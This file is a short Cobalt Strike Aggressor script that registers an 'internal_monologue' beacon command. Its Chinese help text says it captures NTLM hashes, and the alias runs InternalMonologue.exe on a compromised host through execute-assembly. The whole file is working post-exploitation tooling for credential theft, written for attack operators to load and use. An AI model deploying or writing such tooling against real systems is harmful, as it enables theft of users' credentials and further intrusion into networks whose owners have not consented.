beacon_command_register("internal_monologue", "调用本地包进行NTLM认证,抓取hash",
	"Usage: internal_monologue \n\n" .
	"Uses execute-assembly to run the assembly.  No arguments needed \n");
alias internal_monologue{
	local('$bid $asm $desc @args $argu');
	$bid = $1;
	$desc = "InternalMonologue";
	@args = @_;
	remove(@args, $bid);
	$argu = join(' ', @args);
	if ($argu eq ""){
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
	}
	else{
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
	}
	bexecute_assembly!($bid, script_resource("exe/InternalMonologue.exe"), $argu);
}
